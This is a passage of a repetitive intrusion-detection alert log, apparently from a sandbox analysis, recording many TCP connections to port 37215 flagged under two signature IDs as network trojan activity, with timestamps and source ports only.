          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858463
          SID:2829579
          Source Port:35808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510613
          SID:2829579
          Source Port:45146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270867
          SID:2829579
          Source Port:49896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465113
          SID:2829579
          Source Port:51184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850667
          SID:2829579
          Source Port:37658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133741
          SID:2835222
          Source Port:59696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897363
          SID:2835222
          Source Port:36540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706301
          SID:2829579
          Source Port:37848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815191
          SID:2829579
          Source Port:43158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817251
          SID:2829579
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402498
          SID:2835222
          Source Port:54146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495855
          SID:2829579
          Source Port:57054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264414
          SID:2829579
          Source Port:52500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745510
          SID:2835222
          Source Port:53324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912193
          SID:2829579
          Source Port:56892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353089
          SID:2829579
          Source Port:60016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151374
          SID:2835222
          Source Port:50822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405163
          SID:2829579
          Source Port:58190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396321
          SID:2829579
          Source Port:56938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912347
          SID:2829579
          Source Port:48044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745660
          SID:2829579
          Source Port:40590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747086
          SID:2835222
          Source Port:60900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705496
          SID:2835222
          Source Port:59478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067657
          SID:2835222
          Source Port:43672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736583
          SID:2835222
          Source Port:33052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732193
          SID:2829579
          Source Port:57922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736966
          SID:2835222
          Source Port:40064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108414
          SID:2829579
          Source Port:41706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174568
          SID:2829579
          Source Port:50266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259090
          SID:2829579
          Source Port:52240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158448
          SID:2829579
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041263
          SID:2835222
          Source Port:34092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175658
          SID:2835222
          Source Port:47074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262181
          SID:2835222
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274012
          SID:2835222
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601442
          SID:2835222
          Source Port:42986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405817
          SID:2829579
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445953
          SID:2829579
          Source Port:52948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236731
          SID:2835222
          Source Port:48484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460972
          SID:2829579
          Source Port:48242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553365
          SID:2829579
          Source Port:40644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800551
          SID:2835222
          Source Port:43318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496155
          SID:2829579
          Source Port:56182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160383
          SID:2829579
          Source Port:37978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673184
          SID:2829579
          Source Port:51618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129357
          SID:2835222
          Source Port:39778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405087
          SID:2829579
          Source Port:50974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912830
          SID:2835222
          Source Port:49460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158964
          SID:2829579
          Source Port:51284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796402
          SID:2835222
          Source Port:40384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858442
          SID:2829579
          Source Port:60464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732384
          SID:2829579
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264369
          SID:2829579
          Source Port:60426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518183
          SID:2835222
          Source Port:36638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.088090
          SID:2829579
          Source Port:39320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188079
          SID:2835222
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672682
          SID:2835222
          Source Port:53660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888502
          SID:2835222
          Source Port:36092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099398
          SID:2835222
          Source Port:55550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796614
          SID:2829579
          Source Port:43326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444202
          SID:2835222
          Source Port:46208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806864
          SID:2835222
          Source Port:34398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842143
          SID:2835222
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449906
          SID:2829579
          Source Port:34104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887392
          SID:2835222
          Source Port:48218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892352
          SID:2835222
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792379
          SID:2835222
          Source Port:50274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113242
          SID:2829579
          Source Port:37374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894931
          SID:2829579
          Source Port:37376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817435
          SID:2829579
          Source Port:52452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731009
          SID:2835222
          Source Port:51580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747571
          SID:2829579
          Source Port:36172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514846
          SID:2829579
          Source Port:58840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604622
          SID:2829579
          Source Port:33886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669967
          SID:2829579
          Source Port:55592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406851
          SID:2829579
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131965
          SID:2829579
          Source Port:58742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403526
          SID:2835222
          Source Port:54438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861481
          SID:2835222
          Source Port:51662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731770
          SID:2829579
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671855
          SID:2835222
          Source Port:33222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461566
          SID:2829579
          Source Port:34486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542263
          SID:2829579
          Source Port:39914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793129
          SID:2835222
          Source Port:35194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740332
          SID:2829579
          Source Port:47568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395922
          SID:2829579
          Source Port:48396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272206
          SID:2829579
          Source Port:37668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800696
          SID:2829579
          Source Port:53626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548687
          SID:2835222
          Source Port:37096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819001
          SID:2829579
          Source Port:60050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741542
          SID:2829579
          Source Port:37956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038043
          SID:2829579
          Source Port:53906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447193
          SID:2835222
          Source Port:56652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551021
          SID:2829579
          Source Port:33212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862500
          SID:2835222
          Source Port:47656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896247
          SID:2835222
          Source Port:50786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897245
          SID:2829579
          Source Port:33092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241513
          SID:2835222
          Source Port:44284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267813
          SID:2835222
          Source Port:38426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888447
          SID:2829579
          Source Port:45980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668204
          SID:2835222
          Source Port:51142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471184
          SID:2829579
          Source Port:55376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108987
          SID:2835222
          Source Port:51644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161459
          SID:2829579
          Source Port:55124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855111
          SID:2829579
          Source Port:46166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817273
          SID:2835222
          Source Port:46274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812629
          SID:2835222
          Source Port:58800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260823
          SID:2829579
          Source Port:38550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306330
          SID:2829579
          Source Port:52880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462422
          SID:2829579
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844476
          SID:2829579
          Source Port:47664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113261
          SID:2835222
          Source Port:54802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784269
          SID:2835222
          Source Port:41848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894044
          SID:2829579
          Source Port:59840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189256
          SID:2829579
          Source Port:60170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259156
          SID:2829579
          Source Port:57780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789810
          SID:2829579
          Source Port:36484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112218
          SID:2835222
          Source Port:33038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113944
          SID:2835222
          Source Port:55230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037263
          SID:2829579
          Source Port:59338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902309
          SID:2829579
          Source Port:40654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850635
          SID:2829579
          Source Port:52264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667813
          SID:2829579
          Source Port:45418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783375
          SID:2835222
          Source Port:34558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672544
          SID:2835222
          Source Port:37340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405403
          SID:2835222
          Source Port:37842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036345
          SID:2829579
          Source Port:56090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079014
          SID:2835222
          Source Port:43814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020404
          SID:2829579
          Source Port:53344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446771
          SID:2835222
          Source Port:47782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548797
          SID:2835222
          Source Port:51638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553242
          SID:2835222
          Source Port:50682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175917
          SID:2829579
          Source Port:38214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599650
          SID:2829579
          Source Port:48866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176220
          SID:2829579
          Source Port:38136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406892
          SID:2835222
          Source Port:35694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729187
          SID:2835222
          Source Port:46244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352912
          SID:2835222
          Source Port:60906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352925
          SID:2829579
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408221
          SID:2835222
          Source Port:37694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599017
          SID:2829579
          Source Port:56186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276435
          SID:2829579
          Source Port:33530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191941
          SID:2829579
          Source Port:45920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729447
          SID:2835222
          Source Port:33954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159811
          SID:2835222
          Source Port:48884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396940
          SID:2835222
          Source Port:42476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276537
          SID:2829579
          Source Port:34318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861232
          SID:2829579
          Source Port:41190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130092
          SID:2835222
          Source Port:60540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548501
          SID:2829579
          Source Port:53526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.734045
          SID:2835222
          Source Port:55512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509878
          SID:2835222
          Source Port:60056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155431
          SID:2829579
          Source Port:50770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738597
          SID:2835222
          Source Port:42012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043728
          SID:2829579
          Source Port:55750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599387
          SID:2835222
          Source Port:49974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780386
          SID:2829579
          Source Port:42250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815377
          SID:2835222
          Source Port:60806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796156
          SID:2829579
          Source Port:48928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799034
          SID:2829579
          Source Port:55328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269620
          SID:2835222
          Source Port:44186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672410
          SID:2829579
          Source Port:44810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179640
          SID:2835222
          Source Port:42680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005612
          SID:2835222
          Source Port:47160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737916
          SID:2829579
          Source Port:51332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843911
          SID:2829579
          Source Port:59872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188866
          SID:2829579
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742986
          SID:2835222
          Source Port:33544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175031
          SID:2829579
          Source Port:57790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789754
          SID:2835222
          Source Port:49992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352245
          SID:2829579
          Source Port:57504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514287
          SID:2829579
          Source Port:43184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466554
          SID:2829579
          Source Port:49436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351928
          SID:2829579
          Source Port:60940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745074
          SID:2835222
          Source Port:58426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466333
          SID:2829579
          Source Port:55724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820970
          SID:2835222
          Source Port:57332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467480
          SID:2829579
          Source Port:34326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789035
          SID:2829579
          Source Port:40948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792270
          SID:2835222
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671213
          SID:2835222
          Source Port:56456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352457
          SID:2835222
          Source Port:35404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467006
          SID:2835222
          Source Port:48798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108706
          SID:2829579
          Source Port:44578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600165
          SID:2829579
          Source Port:57412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164232
          SID:2835222
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784042
          SID:2829579
          Source Port:52236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782583
          SID:2829579
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.472134
          SID:2835222
          Source Port:32782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740162
          SID:2829579
          Source Port:49632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018940
          SID:2835222
          Source Port:55968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106140
          SID:2829579
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352542
          SID:2829579
          Source Port:60152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859529
          SID:2829579
          Source Port:40146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791845
          SID:2835222
          Source Port:57144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792023
          SID:2829579
          Source Port:49500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075137
          SID:2829579
          Source Port:58666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
